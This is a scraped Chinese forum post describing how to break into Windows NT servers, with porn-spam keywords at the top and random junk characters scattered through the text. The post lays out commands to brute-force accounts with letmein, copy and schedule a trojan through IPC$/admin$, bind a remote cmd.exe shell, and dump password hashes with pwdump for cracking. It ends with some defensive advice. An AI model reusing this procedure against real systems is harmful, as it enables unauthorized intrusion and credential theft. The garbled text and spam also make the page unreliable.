久久综合伊人噜噜色,日本三级香港三级人妇电影精品,亚洲中文色资源,国产高清一区二区三区人妖

      <small id="r7w9x"></small>
          <td id="r7w9x"></td><sub id="r7w9x"><menu id="r7w9x"><samp id="r7w9x"></samp></menu></sub>
        1. <th id="r7w9x"></th>
          1.  找回密碼
             注冊

            QQ登錄

            只需一步,快速開始

            遠程入侵NT ----spp(低音炮)

            [復(fù)制鏈接]
            1#
            發(fā)表于 2011-1-12 16:31:02 | 只看該作者 |倒序瀏覽 |閱讀模式
            看了篇文章介紹使用netbus 或 netspy 遠程入侵nt系統(tǒng),感覺真是。。看來nt系統(tǒng)的共享機制如果不配合火墻使用,SMB會給你造成很大麻煩。?!∵B小小 只的木馬都可以讓nt管理員頭大。   U, j" P! l. z( ?' _
                其攻擊過程如下: ) f4 D% a/ x2 x/ B7 j/ A1 [
            1、使用掃描工具查找NT主機      
            - ]- A% U) {; c" k) q2 、確定攻擊目標(biāo)后,使用letmein 對目標(biāo)主機進行攻擊, 如: " z4 ]$ N' g7 t4 ?8 x
            letmein file://x.x.x.x/ -all -g mypwd (對\\x.x.x.x上所有用戶攻擊) / b2 m) [0 Y- g5 L7 z- f% K0 K
            letmein file://x.x.x.x/ -admin -g mypwd (對\\x.x.x.x上管理員攻擊) # Y7 ?/ v0 W+ V1 l0 S; L" ^! h
            letmein file://x.x.x.x/ -all -d mypwd (顯示\\x.x.x.x上所有用戶) / ]! b5 n, U6 b9 `' f
            注:- 確定目標(biāo)后,收集目標(biāo)信息并嘗試取得非法資源 ; x: p* ?5 d2 V* l) X* ?* @
            3、當(dāng)letmein 獲取相關(guān)管理員權(quán)限后,使用ms提供的合法命令: 4 r8 J" J4 e' e7 N
            net use \\x.x.x.x\ipc$ "pass"/user:"user" 連接遠程資源并將木馬拷入遠程
            9 Q8 F  P* C( Ucopy x:\netserver.exe \\x.x.x.x\admin$\system32 9 H: [) Y" n& r. }# r
            4、使用合法ms命令遠程啟動木馬服務(wù): . y: f3 l% U. O1 X$ w5 M0 _
            netsvc \\x.x.x.x schedule /start at \\x.x.x.x hh:mm netserver.exe /port:yourport /nomsg
            4 [9 ?! `: D; s! V) `/ b! k, z4 W( K
               該方法有其巧妙之處。。利用nt的任務(wù)計劃管理,在特定時候啟動木馬服務(wù) 0 I0 v8 f' J1 S  z, w9 M
            0 [; A# W% A: k; ?
               另一種方法: ; P2 W4 P: ]' R& t# L3 Z, Y& w
               將ntsrver.exe 或其他運行程序Copy到目的服務(wù)器的www可執(zhí)行目錄, 如cgi-bin或scripts,然后在瀏覽器鍵入url如: http://x.x.x.x/scripts/ntsrver.exe /port:yourport 或 http://x.x.x.x/cgi-gin/ntsrver.exe /port:yourport 木馬服務(wù)將被啟動9 x' ~3 {0 _* i/ ]: m
            7 d: w, Q2 d4 q  w# p6 [+ O
                到此,該次攻擊可以算成功了,遠程資源已在別人控制下。 / k1 f' K( d; e" ^8 x2 ?
                如果在遠程使用app redirect 啟動一個cmd.exe到特定端口 , 那么你可以telnet 到該端口,更方便使用該遠程資源 。比如:使用pwdump 將遠程nt上所有用戶和密碼 dump成文件,回傳本地,使用其他工具如l0phtcrack來運算。 分析該次攻擊的整體過程,不難看出,關(guān)鍵步驟是letmein取得admin權(quán)限,但是很不幸,就目前廈門(有些是省內(nèi))的nt服務(wù)器管理員而言,密碼對letmein只是多花幾分鐘而已。我對某些大的公共平臺服務(wù)器進行掃描的結(jié)果,除了solaris和linux系統(tǒng)之外,其余的nt被letmein猜中率有75%以上。而且在這些被進入的機器上,SMB都有在tcp/ip上 跑,有兩臺有配備火墻,但是沒有封閉對外137-139口。
            , g) @' Z9 C) v0 |, X! J0 O$ O+ T
            " i6 W; G& L. [3 L     對策:
            6 V# k& N+ j3 ]  B1、還是老話,密碼的選擇問題,使用向..@2KjsfiM7v!09..這樣的密碼會讓任何使用 暴力法計算的機器算到cpu燒掉。 6 x9 J: F! w8 e0 C% T- N# c3 j
            2、nt網(wǎng)絡(luò)的適當(dāng)配置,不要在對外的nc綁定共享服務(wù)是個好習(xí)慣,特別是tcp/ip協(xié)議。
            0 x7 D* _% \  n* U! b. A/ w3、防火墻的配置,屏蔽一切不需要的服務(wù)端口,象netebui在tcp/ip上的137-139口,開這些口只會使你的系統(tǒng)處于危險的處境,如果非要在遠程使用這些口的服務(wù),建議使用其他軟件來代替。
            " ]; k% F8 p- O4、及時檢查日記和監(jiān)控服務(wù)的運行,定時對文件系統(tǒng)的權(quán)限受托關(guān)系進行檢查。
            * q. \+ s3 n7 L2 w5、管理人員素質(zhì)的提高,安全風(fēng)險意思加強無疑對你管理的系統(tǒng)有很多好處。 -- SPP 10Hz的低頻 你聽不到的聲音卻無時不刻在影響著你 。
            % x" y; u" w9 r6 c0 M8 l3 V! m
            您需要登錄后才可以回帖 登錄 | 注冊

            本版積分規(guī)則

            QQ|本地廣告聯(lián)系: QQ:905790666 TEL:13176190456|Archiver|手機版|小黑屋|汶上信息港 ( 魯ICP備19052200號-1 )

            GMT+8, 2025-7-13 09:48

            Powered by Discuz! X3.5

            © 2001-2025 Discuz! Team.

            快速回復(fù) 返回頂部 返回列表